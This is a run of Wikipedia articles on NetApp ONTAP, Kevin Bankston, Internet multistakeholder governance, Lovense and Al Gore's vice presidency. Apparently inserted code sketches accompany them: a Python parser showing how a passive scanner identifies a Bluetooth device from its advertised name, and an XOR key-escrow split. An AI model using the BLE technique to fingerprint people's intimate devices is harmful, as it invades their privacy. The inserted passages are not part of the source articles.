protocol for transferring data from the edge to a data center or a cloud. In April 2019, Octavian Tanase, SVP ONTAP, posted a preview photo on Twitter of ONTAP running in Kubernetes as a container for demonstration purposes.
Cloud Volumes ONTAP
Cloud Volumes ONTAP (formerly ONTAP Cloud) includes nearly the same functionality as ONTAP Select, because it is also a virtual storage appliance (VSA), and can be ordered from hyperscale cloud providers such as Amazon AWS, Microsoft Azure and Google Cloud Platform. IBM Cloud uses ONTAP Select for the same reasons, instead of Cloud Volumes ONTAP.
Cloud Volumes ONTAP can provide high availability of data across different regions in the cloud. Cloud Volumes ONTAP leverages RAID data protection at the SSD and HDD drive level with the cloud provider's underlying IP SAN storage system.
Feature comparison
A feature comparison between platforms is applicable to the latest ONTAP version.
See also
Write Anywhere File Layout (WAFL), used in NetApp storage systems
NetApp
NetApp FAS
External links
ONTAP Data Management Software (product page)
ONTAP Cloud (product page)
ONTAP Select (product page)
ONTAP 9 Datasheet
References
Operating system families
55801828
https://en.wikipedia.org/wiki/Kevin%20Bankston
Kevin Bankston
Kevin Stuart Bankston (born July 2, 1974) is an American activist and attorney who specializes in free speech and privacy law. He is currently Privacy Policy Director at Facebook, where he leads policy work on AI and emerging technologies. He was formerly the director of the Open Technology Institute (OTI) at the New America Foundation in Washington, D.C.
Education
Bankston earned a BA at the University of Texas at Austin. In 2001 he completed a Juris Doctor at the University of Southern California.
Career
In his early career Bankston served, from 2001 until 2002, as a Justice William J. Brennan First Amendment Fellow for the American Civil Liberties Union (ACLU) in New York City. At the ACLU he litigated Internet-related free speech cases. He then joined the Electronic Frontier Foundation in 2003 as an Equal Justice Works/Bruce J. Ennis Fellow. From 2003 until 2005 he studied the impact that anti-terrorism-related surveillance initiatives had on online privacy and free speech after 9/11. At the EFF he specialized in free speech and privacy law and later became senior staff attorney. Bankston was a lead counsel in the EFF's lawsuits against the National Security Agency (NSA) and AT&T, which challenged the lawfulness of the NSA's warrantless wiretapping program. After working for almost ten years at the EFF, Bankston joined the Center for Democracy & Technology (CDT) in Washington, D.C. in early 2012. As senior counsel and director of the Free Expression Policy Project, he advocated on a variety of internet and technology policy issues at the nonprofit organization. In November 2013 he spoke before the Senate Committee on the Judiciary, Subcommittee on Privacy, Technology and the Law on the Surveillance Transparency Act of 2013. He later became the director of the Open Technology Institute (OTI) at the New America Foundation in Washington, D.C.
Affiliations
Since 2005 he has served on the board of the First Amendment Coalition, a non-profit public interest organization. He was a non-residential fellow at the Stanford Law School's Center for Internet & Society.
Publications
The Washington Post, Opinions: The books, films and John Oliver episodes that explain encryption (March 25, 2016)
Just Security: It's Time to End the "Debate" on Encryption Backdoors (July 7, 2015)
Lawfare: Ending The Endless Crypto Debate: Three Things We Should Be Arguing About Instead of Encryption Backdoors (June 14, 2017)
Electronic Frontier Foundation: EFF Analysis of the Security and Freedom Ensured Act (S. 1709) (October 30, 2003)
CNN: A year after Edward Snowden, the real costs of NSA surveillance (co-authored with Danielle Kehl)
While working for the EFF, Bankston wrote dozens of articles for its "Deeplinks Blog".
References
1974 births
Living people
American civil rights activists
American lawyers
University of Texas at Austin alumni
USC Gould School of Law alumni
American Civil Liberties Union people
Electronic Frontier Foundation people
Stanford Law School faculty
American political writers
New America (organization)
55811237
https://en.wikipedia.org/wiki/Internet%20multistakeholder%20governance
Internet multistakeholder governance
Multistakeholder participation is a specific governance approach whereby relevant stakeholders participate in the collective shaping of evolutions and uses of the Internet. In 2005, the Working Group on Internet Governance (WGIG), set up by the World Summit on the Information Society (WSIS), defined Internet governance as: 'development and application by Governments, the private sector and civil society, in their respective roles, of shared principles, norms, rules, decision-making procedures, and programs that shape the evolution and use of the Internet'. This is not identical to undifferentiated public participation in Internet issues. Instead, the concept of 'multistakeholder' signals specifically the distinct clusters of interests involved in any given digital issue and how these interests can be aggregated into decisions towards an Internet for the general interest, rather than one captured by a single power center. The general principle of participation in decision-making that impacts the lives of individuals has been part of the Internet from its outset, accounting for much of its success. Multistakeholder participation recognizes the value of incorporating users and a user-centric perspective, as well as all other actors critical to developing, using and governing the Internet, across a range of levels. The other principles are enriched by the multistakeholder participation principle, because it states that everyone should have a stake in the future of the Internet. It is possible to define a number of broad categories of stakeholders in the Internet, with subgroups as well: states, businesses and industries, non-governmental actors, civil society, international governmental organizations, research actors, individuals, and others. Each of these categories has more or less unique stakes in the future of the Internet, but there are also areas of great overlap and interdependence.
For instance, some NGOs are likely to prioritize the promotion of human rights, while parliaments are primary actors in defining laws to protect these rights. Still other stakeholders are key to shaping rights online, such as search engine providers and Internet Service Providers (ISPs). Individuals also have particular roles to play in respecting, promoting and protecting rights.
Internet governance
Internet governance is the development and application of shared principles, norms, rules, decision-making procedures, and programs that shape the evolution and use of the Internet. It should not be confused with e-governance, which refers to governments' use of technology to carry out their governing duties. Although some argue that Internet governance 'as a unitary regime may in fact be an impossibility', a broader conceptualisation of governance recognises both the entirety and the diversity of governance activities that steer the "ship". The Tunis Agenda for the Information Society defines Internet governance as: "the development and application by governments, the private sector and civil society, in their respective roles, of shared principles, norms, rules, decision-making procedures, and programmes that shape the evolution and use of the Internet."
Specificity
It is often argued that multistakeholder participation is better, at least in principle, 'than governance by governments alone', as it can uphold the interests of non-elected actors in relation to governments (most of which are elected, though some are not). In addition, governments may lack the necessary competence and/or adequate political will for expert and benign Internet governance.
Multistakeholder participation more broadly can be posited as a way to prevent capture of the Internet by one constituency at the expense of another – whether this is capture by various state actors and their interstate organizations, or by private sector interests nationally or internationally. In other words, governments themselves have an interest in multistakeholder modalities as a way to prevent Internet capture by other power centers. The participation of more stakeholders can inject expertise and reflect a diversity of needs. The legitimacy thus ascribed to multistakeholder decision-making is closely tied to 'the expectation of a higher quality of policy outcomes', or simply 'better governance'. The reality of multistakeholder participation is sometimes challenged by issues that relate both to the nature of the Internet itself – including jurisdiction and enforcement, scale, and the pace at which it changes and grows – and to challenges pertaining to its governance.
Stakeholders
Broadly taken, the notion of stakeholders considers anyone or any entity with a legitimate interest in a particular Internet governance issue as a 'stakeholder'. It recognizes that not all stakeholders automatically self-realize or self-identify as stakeholders, and not all multistakeholder processes include all stakeholders. It further recognizes that multistakeholder-based participation represents interests-based participation, rather than undifferentiated, individual or idiosyncratic involvement by members of the public. Multistakeholder approaches should welcome and not exclude disagreement and minority or less-popular viewpoints, but may justifiably exclude disruptive actors who deploy disagreement to unreasonably disrupt the process or to damage trust.
Gender divides are a significant and pressing challenge facing the Universality of the Internet ecosystem – ranging from women's ability to access and benefit from the Internet to their ability to participate meaningfully in multistakeholder processes. Gender itself can be described as 'the social and cultural constructs that each society assigns to behaviors, characteristics and values attributed to men and women, reinforced by symbols, laws and regulations, institutions, and perceptions.' There is continued disagreement about what the definition of multistakeholder participation in governance actually is or should be; issues of due recognition; the scope of participation and the unequal nature of representation – particularly from developing countries and civil society participants; the (in)ability to reach consensus; the exclusivity of some ostensibly inclusive processes and the unwillingness to listen to different views; attempts to establish legitimacy; the sometimes slow pace of multistakeholder mechanisms; as well as the increasing number of stakeholders and the complexity of challenges involved as the importance of the Internet to everyday life and economies becomes increasingly clear. All these challenges are significant, and sometimes they differ depending on the context and the issue or topic at hand. However, three general concerns frequently mentioned in the literature relate to the conspicuous dominance or absence of certain participants, especially the private sector; how multistakeholder mechanisms should be balanced with multilateral arrangements; and what the relationship between Internet governance at national and international levels is or should be.
The evolution of multistakeholder participation
Multistakeholder participation and governance mechanisms may be a 'rather recent invention', but they have a longer tradition as an 'organizing principle and political practice'.
Such approaches are far from unique to Internet governance, with claims of their application and use especially prevalent in topics with cross-border or international relevance. Examples include labour relations, environmental protection, finance, human rights, and sustainable development. Where the Internet is concerned, multistakeholder participation in its governance seems to be both more intrinsic – and more complicated – than in many other instances of multistakeholder participation. The ways in which the Internet was designed have both allowed and disallowed specific types of behaviour online, meaning that the actions that led to the creation of the Internet were already acts of governance (albeit most likely unintended ones). Although some have argued that the Internet is free from any regulatory oversight or jurisdictional restraints and should remain so, the Internet internally was never entirely rule-free nor a 'law-free zone', nor was it a universe apart from external legal constraints. Due to its unique design and composition, many have argued that the Internet requires non-traditional forms of governance – and particularly governance forms encouraging the participation of more stakeholders in addition to governments (democratic or otherwise), which have been the key agents of governance in the Westphalian system of national states. The Internet is often cited as not only one of the prime examples of multistakeholder participation in governance, but is sometimes described as inherently 'multistakeholder'. The Internet is defined by open, distributed, interconnected, participatory, and bottom-up processes – features that match multistakeholder participation in specific regard to its governance. Vint Cerf, one of the authors of the Internet Protocol (IP), has similarly noted that: "There is no question in my mind that the diversity of players in the Internet universe demands a multi-stakeholder approach to governance in the most general sense of the word."
The debate around how the Internet is or should be governed has in some ways evolved from a discussion of how and whether the Internet can be governed to one concerning 'whether there is (or should be) something new and different about the way we do so'. Cerf's words 'in the most general sense of the word' are important, as they also underpin the view that multistakeholder approaches should not be understood in a dogmatic manner. The demand for and value of multistakeholder participation in Internet governance was first explicitly expressed at the WSIS, which took place in two phases between 2003 (in Geneva, Switzerland, with a focus on principles) and 2005 (in Tunis, Tunisia, with a focus on implementation).
Multistakeholder governance in practice
KICTANet
Kenya is widely regarded as a leading developing-country participant in the global Internet governance field and has one of the most vibrant Internet governance communities in Africa. Kenya's information and communications technology (ICT) evolution, explains Professor Bitange Ndemo, who previously served as Kenya's Permanent Secretary for ICT, was catalysed during President Mwai Kibaki's administration (2003-2013). This 'golden decade' for ICT innovation spurred numerous policy developments in the country's ICT sector, along with corresponding success stories like the innovative mobile financial service M-PESA. It saw the creation of not only the world's first national and regional IGF initiatives, but also an oft-lauded multistakeholder platform for deliberation on policy and other developments pertaining to the ICT sector, the Kenya ICT Action Network (KICTANet), founded in October 2004.
Alice Munyua, who was part of Kenya's civil society delegation to WSIS, explains that shortly after WSIS she was commissioned to support the development of Kenya's ICT sector as a part of Catalysing Access to ICT in Africa (CATIA), a development programme which was supported by the UK Department for International Development (DFID). Recognizing the ICT policy gap in Kenya, Munyua commissioned research to determine which stakeholders would need to be consulted or engaged in developing a new ICT policy for the country. As she later advised in a co-written volume: It is useful to carry out a stakeholder analysis at the beginning of a multi-stakeholder process to ensure that there is a clear understanding of who should be involved in the process, to what extent, and at what time during the process. Using the results of the Kenya stakeholder analysis, participants from the media, business, civil society, academic, and development sectors were invited to an initial meeting in October 2004. KICTANet was created as a loose alliance at this meeting with the specific aim of developing an ICT policy framework for the country. It was specifically designed to welcome multistakeholder participation due to the 'perceived strength and effectiveness in joint collaborative policy advocacy activities, which would be based on pooling skills and resources,' as opposed to wasting resources in 'competing, overlapping advocacy'. Its operating slogan was, 'let's talk though we may not agree'. Tina James, who worked with CATIA when it supported the creation of KICTANet, points out: 'the creation of KICTANet was just the right process at the right time.' With government and other stakeholders apparently relying on it, KICTANet therefore continued after the ICT policy was adopted, leading to 'quite a lot of successes' like the 2010 Kenya ICT Master Plan, as well as the regulatory approval of M-Pesa and Voice over Internet Protocol (VOIP) services in the country. 
It also, for instance, participated in discussions that led to the drafting and passing of the National Cybersecurity Strategy (2014) and coordinated public participation in consultations like the 2014 African Union Convention on Cybersecurity. By managing a website and mailing list with almost 800 participants from diverse stakeholder groups, it has been described as 'perhaps the biggest virtual convener of ICT stakeholders in Kenya'. Grace Mutung'u, a KICTANet associate responsible for policy and regulatory analysis, worries that Kenya's Internet governance capacity is still limited to a 'small bubble', leading to doubts about the network's actual capacity and influence in the country.
The Marco Civil
The Marco Civil da Internet, otherwise known as the Brazilian Internet Bill of Rights or the Brazilian Civil Rights Framework for the Internet, was sanctioned by then president Dilma Rousseff at the time of the NETmundial meeting in 2014. This case is viewed as one of the first attempts to make such initiatives more concrete, formal, accountable, and tangible, rather than merely aspirational, and it is therefore identifiable as falling under what has come to be known as the 'digital constitutionalism' umbrella. The Marco Civil process also shows that multistakeholder processes are 'a compelling hallmark of digital constitutionalism'. The Marco Civil emerged as a rights-based response to the 'Azeredo' cybercrime bill. The process began in 2009 when the Ministry of Justice's Office of Legislative Affairs (SAL/MJ) requested the Centre for Technology and Society at the Getulio Vargas Foundation (CTS-FGV) to help coordinate a process of public consultations engaging all stakeholders, including those who had been vocal in opposing the Azeredo Bill. SAL/MJ enabled public consultations using a portal administered by the Ministry of Culture.
SAL's principal reason for using this platform was that the participatory process enabled by the online platform would serve as a complementary branch to the traditional legislative process. As some analysts point out: "Once it became clear that Brazil needed a bill of rights for the Internet, it also became clear that the Internet itself could and should be used as a tool for drafting the legislation". The period of public comments was divided into two phases. The first phase involved consulting with the general public regarding certain principles proposed for debate, while the second phase involved examining each article and paragraph of the proposed draft bill. A focus group participant pointed out that dividing the process into these two phases allowed stakeholders sufficient time to develop positions on key aspects of the Bill. After the process of public consultations, the Marco Civil was introduced in the National Congress on 24 August 2011. The bill was submitted to the House of Representatives on several occasions but was unable to make further progress in parliament. Carlos Affonso Souza, director of the Institute for Technology and Society of Rio de Janeiro (ITS Rio), remembers that this moment in the bill's development coincided with a change of administration and became a 'crucial moment' with concerns as to whether the Bill would withstand political constraints and change: People began to wonder if the multistakeholder effort that took us so long to achieve was being put in peril because of this change of administration. The Marco Civil only resurfaced on the national legislative agenda in 2013 when Edward Snowden, an ex-National Security Agency (NSA) contractor, made revelations regarding pervasive surveillance practices by certain intelligence agencies. In September 2013, Rousseff decided that the bill should be tabled in the House of Representatives and the Senate with constitutional urgency. 
The final version explicitly notes that, to aid the development of the Internet in Brazil, mechanisms must be established to enhance and guarantee multistakeholder, transparent, collaborative, and democratic participation between private actors, civil society, and academia (Art. 24). The WSIS process outcomes and the CGI.br Principles also provide important reference points for Brazil's adoption of multistakeholder approaches in international fora where Internet governance is concerned.
South Korea's case
The constitutional challenge in South Korea illustrates not only a multistakeholder model but also the importance of having strong institutions, like an independent judiciary, to protect human rights online. On 24 August 2012, the South Korean Constitutional Court unanimously ruled that certain user identity verification provisions in the country were unconstitutional. For five years, the provisions had required all major website operators in South Korea to obtain, verify, and store personal identification details from any user wanting to post anything on their platforms. This constitutional challenge shows how stakeholders collaborated to bring the case before the Constitutional Court of South Korea. The consequences of the provisions were widespread and attracted both local and global criticism. For instance, Frank La Rue, then the United Nations (UN) Special Rapporteur on the Promotion and Protection of Freedom of Expression, undertook a mission to South Korea in May 2010 and expressed concerns about the condition of freedom of expression in the country. While he acknowledged the need to protect citizens from 'legitimate concerns regarding crimes perpetrated via the Internet and the responsibility of the Government to identify such persons', he also warned about potential chilling effects and the 'impact of such identification systems to the right to freedom of expression, which is rooted in anonymity'.
Around 2008, certain South Korean Internet stakeholders – including academics, the business community, the technical community, civil society, and participants from the legal community – started having frequent, informal meetings to discuss Internet policies and related issues. These discussions became more vibrant after YouTube disabled its Korean page and published a blog post explaining and defending its global stance on freedom of expression. The technical community provided information about how futile it was to try to identify users accurately or to measure the number of unique visitors to a page, while the business community provided data on the costs of establishing, storing, and managing such a system safely. Civil society organizations presented concerns to the Court about the effects the provisions were having on fundamental rights and the value of online anonymity. The Constitutional Court issued a unanimous ruling on 24 August 2012 that the provisions were unconstitutional for reasons ranging from the effect of the provisions on freedom of expression, freedom of the media, and the right to privacy, to the unfair costs incurred by website operators. Professor Keechang Kim considers that: "What happened in South Korea really shows some of the very serious shortcomings or negative consequences if Internet-related policies are taken in a very one-sided, top-down manner." This case shows that reactive multistakeholder collaboration can be useful in addressing challenges, like restrictive legislation, that infringe upon Internet Universality (in this case freedom of expression and privacy rights) in one way or another.
The Internet Governance Forum
The Internet Governance Forum (IGF) was created by the WSIS and, more specifically, the Tunis Agenda.
Despite scepticism and criticism relating to, among other things, the IGF's ability to influence policy and/or to act as an Internet governance body, it has been described as integrally 'part of the fabric of internet governance' and as 'a type of new laboratory' in which to 'promote multistakeholderism through multistakeholderism'. One writer, for instance, points out that: "The IGF is the first organisation in Internet governance whose founding was explicitly based on the multi-stakeholder principle." The IGF's Best Practice Forum (BPF) on Gender, more specifically, is global in focus, gender-dimensioned, and emphasises broader public policy. The case also introduces interesting questions pertaining to how multistakeholder participation is affected when disruptive actors participate in a process or activity. The IGF's mandate includes, among other things, discussing public policy issues related to key elements of Internet governance by facilitating the exchange of information and best practices and by making 'full use of the expertise of the academic, scientific and technical communities'. It is, at least in theory, multistakeholder in composition, and should furthermore strengthen and enhance 'the engagement of stakeholders in existing and/or future Internet governance mechanisms, particularly those from developing countries'. To enrich the potential for more tangible outputs, the IGF's Multistakeholder Advisory Group (MAG) and Secretariat developed an intersessional programme intended to complement other IGF activities, such as national and regional IGF initiatives (NRIs), dynamic coalitions (DCs) and so-called best practice forums (BPFs). The outputs from this programme were designed to 'become robust resources, to serve as inputs into other pertinent forums, and to evolve and grow over time'. In 2015, the MAG decided to devote one of six BPFs to a gender-related challenge facing the Internet.
Jac sm Kee of the global civil society organization the Association for Progressive Communications (APC), who was one of the lead coordinators of the BPF Gender in 2015 and 2016, says that gender was increasingly becoming a pressing issue in Internet governance discussions at the time, which was why she originally proposed it to the MAG. While there was debate within the MAG as to what such a BPF should focus on, Kee takes the view that, 'because of the multistakeholder nature' of MAG meetings and programme development procedures, whatever is proposed tends to be 'taken on'. In 2015, the BPF Gender focused more specifically on online abuse and gender-based violence as 'an increasingly important and focused area' in the field of gender and Internet governance. Each year the BPF coordinators and rapporteur adopted a semi-structured methodology, organizing fortnightly virtual calls to introduce the topic to stakeholders, to welcome broader participation, to define the scope of the BPF's priorities, and to investigate proposed methodologies that could encourage multistakeholder participation. In 2016, the BPF also tried to involve more stakeholders from other regions by arranging onsite meetings at certain NRIs, including the Brazil IGF, the Asia-Pacific Regional IGF (APrIGF), and the IGF of Latin America and the Caribbean (LACIGF). These sessions were used to gather local best practices and to raise awareness of the BPF's work. Where possible, lessons and stories gathered from these events were integrated into the BPF's outcome report in 2016. The case of the IGF's BPF Gender illustrates the difficulties of promoting multistakeholder participation in Internet governance when certain, especially potentially contentious, topics are involved. It similarly shows the potential chilling effects that the participation of disruptive actors might have on a volunteer-driven, multistakeholder process.
In that sense, it demonstrates the need to sometimes balance the values of openness and transparency often cherished in multistakeholder processes at the IGF with the need to also protect the safety and privacy of participants. Internet universality Concept Internet Universality is the concept that "the Internet is much more than infrastructure and applications, it is a network of economic and social interactions and relationships, which has the potential to enable human rights, empower individuals and communities, and facilitate sustainable development. The concept is based on four principles stressing that the Internet should be Human rights-based, Open, Accessible, and based on Multistakeholder participation. These have been abbreviated as the R-O-A-M principles. Understanding the Internet in this way helps to draw together different facets of Internet development, concerned with technology and public policy, rights and development." Indicators UNESCO is now developing Internet Universality indicators - based on the ROAM principles - to help governments and other stakeholders assess their own national Internet environments and to promote the values associated with Internet Universality. The research process was envisioned to include consultations at a range of global forums and a written questionnaire sent to key actors, as well as a series of publications on important Internet freedom related issues such as encryption, hate speech online, privacy, digital safety and journalism sources. The outcome of this multidimensional research will be published in June 2018. The final indicators will be submitted to the UNESCO Member States in the International Programme for the Development of Communication (IPDC) for endorsement. Values for effective multistakeholder practices (What if we all Governed the Internet?) Sources References Internet governance
55920197
https://en.wikipedia.org/wiki/Lovense
Lovense
Lovense is a Singapore-based teledildonics sex toy manufacturer known for its VR and smart sex toys, which can be controlled via Bluetooth using the Lovense mobile app. History The company was founded in 2009 when its founder was in a long-distance relationship, which sparked his interest in teledildonics. In 2013, the first app-based sex toys, Max and Nora, were launched. In 2015, Lush was launched with the help of $100,000 raised on the crowdfunding website Indiegogo. Since then, Lovense has released a number of toys, including a Bluetooth butt plug designed for long-distance control and an oscillating G-spot massager. In January 2021, the company announced the ability to participate in "digital orgies" with up to 100 strangers via the Lovense app. Security concerns In March 2021, researchers at ESET published a whitepaper on the potential security risks brought about by the use of digital sex toys. The researchers commented that Lovense devices contained "controversial" design choices, such as a lack of end-to-end encryption in image transfers and the fact that the devices operated using Bluetooth Low Energy technology, which meant they could easily be detected and identified by a Bluetooth scanner. See also Teledildonics References Sex toy manufacturers Manufacturing companies of Singapore Manufacturing companies established in 2009 Singaporean brands 2009 establishments in Singapore Teledildonics
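The Bluetooth Low Energy identifiability concern noted by the ESET researchers can be illustrated with a short sketch: BLE devices broadcast advertising packets built from simple length/type/data structures, and a device that includes its product name in the Complete Local Name field (AD type 0x09) is trivially identifiable by any passive scanner. This is a generic, hypothetical example; the advertisement bytes and the name "Lush" are invented for illustration and do not reproduce Lovense's actual advertisements.

```python
def parse_ble_adv(payload: bytes) -> dict:
    """Parse BLE advertising data (a sequence of [length][AD type][data] structures)."""
    ads = {}
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:
            break
        ad_type = payload[i + 1]
        ads[ad_type] = payload[i + 2 : i + 1 + length]
        i += 1 + length
    return ads

# AD type 0x09 = Complete Local Name. A device that advertises its product
# name in cleartext is identifiable by any passive scanner in range.
adv = bytes([0x02, 0x01, 0x06,        # Flags AD structure
             0x05, 0x09]) + b"Lush"   # Complete Local Name "Lush" (invented)
print(parse_ble_adv(adv)[0x09].decode())  # prints "Lush"
```

Because advertising happens before any pairing or encryption, this metadata leak exists regardless of how the subsequent connection is secured.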
56017942
https://en.wikipedia.org/wiki/Vice%20presidency%20of%20Al%20Gore
Vice presidency of Al Gore
The vice presidency of Al Gore lasted from 1993 to 2001, during the Bill Clinton administration. Al Gore was the 45th vice president of the United States, twice elected alongside Bill Clinton, in 1992 and 1996. Campaign Although Gore had opted out of running for president (due to the healing process his son was undergoing after a car accident), he accepted Bill Clinton's request to be his running mate in the 1992 United States presidential election on July 10, 1992. Clinton's choice was perceived as unconventional (rather than picking a running mate who would diversify the ticket, Clinton chose a fellow Southerner who was close in age) and was criticized by some. Clinton stated that he chose Gore for his foreign policy experience, work with the environment, and commitment to his family. The ticket, known as the Baby Boomer Ticket and the Fortysomething Team, led The New York Times to note that if elected, Clinton (who was 45) and Gore (who was 44) would be the "youngest team to make it to the White House in the country's history." Theirs was the first ticket since 1972 to try to capture the youth vote, one which Gore referred to as "a new generation of leadership." The ticket increased in popularity after the candidates traveled with their wives, Hillary and Tipper, on a "six-day, 1,000-mile bus ride, from New York to St. Louis." Gore also successfully debated the other vice presidential candidates, Dan Quayle (a longtime colleague from the House and the Senate) and James Stockdale. The result was a win by the Clinton-Gore ticket (43%) over the Bush-Quayle ticket (38%). Clinton and Gore were inaugurated on January 20, 1993 and were re-elected to a second term in the 1996 election. Economy and information technology Under the Clinton Administration, the U.S. 
economy expanded, according to David Greenberg (professor of history and media studies at Rutgers University) who argued that "by the end of the Clinton presidency, the numbers were uniformly impressive. Besides the record-high surpluses and the record-low poverty rates, the economy could boast the longest economic expansion in history; the lowest unemployment since the early 1970s; and the lowest poverty rates for single mothers, black Americans, and the aged." In addition, one of Gore's major works as Vice President was the National Performance Review, which pointed out waste, fraud, and other abuse in the federal government and stressed the need for cutting the size of the bureaucracy and the number of regulations. Gore stated that the National Performance Review later helped guide President Clinton when he downsized the federal government. The economic success of this administration was due in part to Gore's continued role as an Atari Democrat, promoting the development of information technology, which led to the dot-com boom (c. 1995-2001). Clinton and Gore entered office planning to finance research that would "flood the economy with innovative goods and services, lifting the general level of prosperity and strengthening American industry." Their overall aim was to fund the development of, "robotics, smart roads, biotechnology, machine tools, magnetic-levitation trains, fiber-optic communications and national computer networks. Also earmarked [were] a raft of basic technologies like digital imaging and data storage." These initiatives met with skepticism from critics who claimed that their initiatives would "backfire, bloating Congressional pork and creating whole new categories of Federal waste." During the election and while Vice President, Gore popularized the term Information Superhighway (which became synonymous with the internet) and was involved in the creation of the National Information Infrastructure. 
The economic initiatives introduced by the Clinton-Gore administration linked to information technology were a primary focus for Gore during his time as Vice President. Gary Stix commented on these initiatives a few months into the administration in his May 1993 article for Scientific American, "Gigabit Gestalt: Clinton and Gore embrace an activist technology policy." Stix described them as a "distinct statement about where the new administration stands on the matter of technology ... gone is the ambivalence or outright hostility toward government involvement in little beyond basic science." Campbell-Kelly and Aspray further note in Computer: A History of the Information Machine: In the early 1990s the Internet was big news. ... In the fall of 1990 there were just 313,000 computers on the Internet; by 1996, there were close to 10 million. The networking idea became politicized during the 1992 Clinton-Gore election campaign, where the rhetoric of the information highway captured the public imagination. On taking office in 1993, the new administration set in place a range of government initiatives for a National Information Infrastructure aimed at ensuring that all American citizens ultimately gain access to the new networks. These initiatives were discussed in a number of venues. Howard Rheingold argued in The Virtual Community: Homesteading on the Electronic Frontier that these initiatives played a critical role in the development of digital technology, stating that "Two powerful forces drove the rapid emergence of the superhighway notion in 1994 ... the second driving force behind the superhighway idea continued to be Vice-President Gore." In addition, Clinton and Gore submitted the report Science in the National Interest in 1994, which further outlined their plans to develop science and technology in the United States. 
Gore also discussed these plans in speeches that he made at The Superhighway Summit at UCLA and for the International Telecommunications Union. On January 13, 1994 Gore "became the first U.S. vice president to hold a live interactive news conference on an international computer network". Gore was also asked to write the foreword to the 1994 internet guide, The Internet Companion: A Beginner's Guide to Global Networking (2nd edition) by Tracy LaQuey. In the foreword he stated the following: Since I first became interested in high-speed networking almost seventeen years ago, there have been many major advances both in the technology and in public awareness. Articles on high-speed networks are commonplace in major newspapers and in news magazines. In contrast, when as a House member in the early 1980s, I called for creation of a national network of "information superhighways," the only people interested were the manufacturers of optical fiber. Back then, of course, high-speed meant 56,000 bits per second. Today we are building a national information infrastructure that will carry billions of bits of data per second, serve thousands of users simultaneously, and transmit not only electronic mail and data files but voice and video as well. The Clinton-Gore administration launched the first official White House website on October 21, 1994. It would be followed by three more versions, resulting in the final edition launched in 2000. The White House website was part of a general movement by this administration towards web based communication: "Clinton and Gore were responsible for pressing almost all federal agencies, the U.S. court system and the U.S. military onto the Internet, thus opening up America's government to more of America's citizens than ever before. On July 17, 1996, 
President Clinton issued Executive Order 13011 - Federal Information Technology, ordering the heads of all federal agencies to fully utilize information technology to make the information of the agency easily accessible to the public." Clipper Chip The Clipper Chip, which "Clinton inherited from a multi-year National Security Agency effort," was a method of hardware encryption with a government backdoor. In 1994, Vice President Gore issued a memo on the topic of encryption which stated that under a new policy the White House would "provide better encryption to individuals and businesses while ensuring that the needs of law enforcement and national security are met. Encryption is a law and order issue since it can be used by criminals to thwart wiretaps and avoid detection and prosecution." Another initiative proposed a software-based key escrow system, in which keys to all encrypted data and communications would reside with a trusted third party. Since the government was seen as possibly having a need to access encrypted data originating in other countries, the pressure to establish such a system was worldwide. These policies met with strong opposition from civil liberty groups such as the American Civil Liberties Union and the Electronic Privacy Information Center, scientific groups such as the National Research Council, leading cryptographers, and the European Commission. All three Clipper Chip initiatives thus failed to gain widespread acceptance by consumers or support from the industry. The ability of a proposal such as the Clipper Chip to meet the stated goals, especially that of enabling better encryption to individuals, was disputed by a number of experts. By 1996, the Clipper Chip was abandoned. Additional projects Gore had discussed his concerns with computer technology and levels of access in his 1994 article, "No More Information Have and Have Nots." 
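The key-escrow mechanism at the heart of the Clipper proposal can be sketched briefly: each device's secret unit key was split into two components held by separate escrow agents, such that both components together, but neither alone, could reconstruct the key. The sketch below uses XOR splitting, which matches the two-component structure of the Clipper escrow; the real scheme additionally involved the classified Skipjack cipher and LEAF fields, so this is a conceptual analogue only.

```python
import os

def split_key(key: bytes):
    """Split a key into two escrow shares; both are needed to rebuild it.
    XOR splitting: share1 is random, share2 = key XOR share1, so each
    share alone is statistically independent of the key."""
    share1 = os.urandom(len(key))
    share2 = bytes(a ^ b for a, b in zip(key, share1))
    return share1, share2

def recover_key(share1: bytes, share2: bytes) -> bytes:
    """Combine both escrow shares to recover the original key."""
    return bytes(a ^ b for a, b in zip(share1, share2))

unit_key = os.urandom(10)            # illustrative 80-bit unit key
s1, s2 = split_key(unit_key)         # e.g. one share per escrow agency
assert recover_key(s1, s2) == unit_key
```

The criticism summarized above follows directly from this structure: whoever can compel both escrow agents (or compromise the escrow database) can decrypt everything, so the system's security reduces to trust in the escrow holders.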
He was particularly interested in implementing measures which would grant all children access to the Internet. Gore had a chance to fulfill this promise when he and President Clinton participated in John Gage's NetDay'96 on March 9, 1996. Clinton and Gore spent the day at Ygnacio Valley High School, as part of the drive to connect California public schools to the Internet. In a speech given at YVH, Clinton stated that he was excited to see that his challenge the previous September to "Californians to connect at least 20 percent of your schools to the Information Superhighway by the end of this school year" was met. Clinton also described this event as part of a time of "absolutely astonishing transformation; a moment of great possibility. All of you know that the information and technology explosion will offer to you and to the young people of the future more opportunities and challenges than any generation of Americans has ever seen." In a prepared statement, Gore added that NetDay was part of one of the major goals of the Clinton administration, which was "to give every child in America access to high quality educational technology by the dawn of the new century." Gore also stated that the administration planned "to connect every classroom to the Internet by the year 2000." On April 28, 1998, Gore honored numerous volunteers who had been involved with NetDay and "who helped connect students to the Internet in 700 of the poorest schools in the country" via "an interactive online session with children across the country." He also reinforced the impact of the Internet on the environment, education, and increased communication between people through his involvement with "the largest one-day online event" of that time, 24 Hours in Cyberspace. The event took place on February 8, 1996 and Second Lady Tipper Gore also participated, acting as one of the event's 150 photographers. 
Gore contributed the introductory essay to the Earthwatch section of the website, arguing that: "The Internet and other new information technologies cannot turn back the ecological clock, of course. But they can help environmental scientists push back the frontiers of knowledge and help ordinary citizens grasp the urgency of preserving our natural world ... But more than delivering information to scientists, equipping citizens with new tools to improve their world and making offices cheaper and more efficient, Cyberspace is achieving something even more enduring and profound: It's changing the very way we think. It is extending our reach, and that is transforming our grasp." Gore was involved in a number of other projects related to digital technology. He expressed his concerns for online privacy through his 1998 "Electronic Bill of Rights" speech in which he stated: "We need an electronic bill of rights for this electronic age ... You should have the right to choose whether your personal information is disclosed." In 1998, he also began promoting a NASA satellite that would provide a constant view of Earth, marking the first time such an image would have been made since The Blue Marble photo from the 1972 Apollo 17 mission. The "Triana" satellite would have been permanently stationed at the L1 Lagrangian point, 1.5 million km away. Gore also became associated with Digital Earth. Environment Gore was also involved in a number of initiatives related to the environment. He launched the GLOBE program on Earth Day '94, an education and science activity that, according to Forbes magazine, "made extensive use of the Internet to increase student awareness of their environment". 
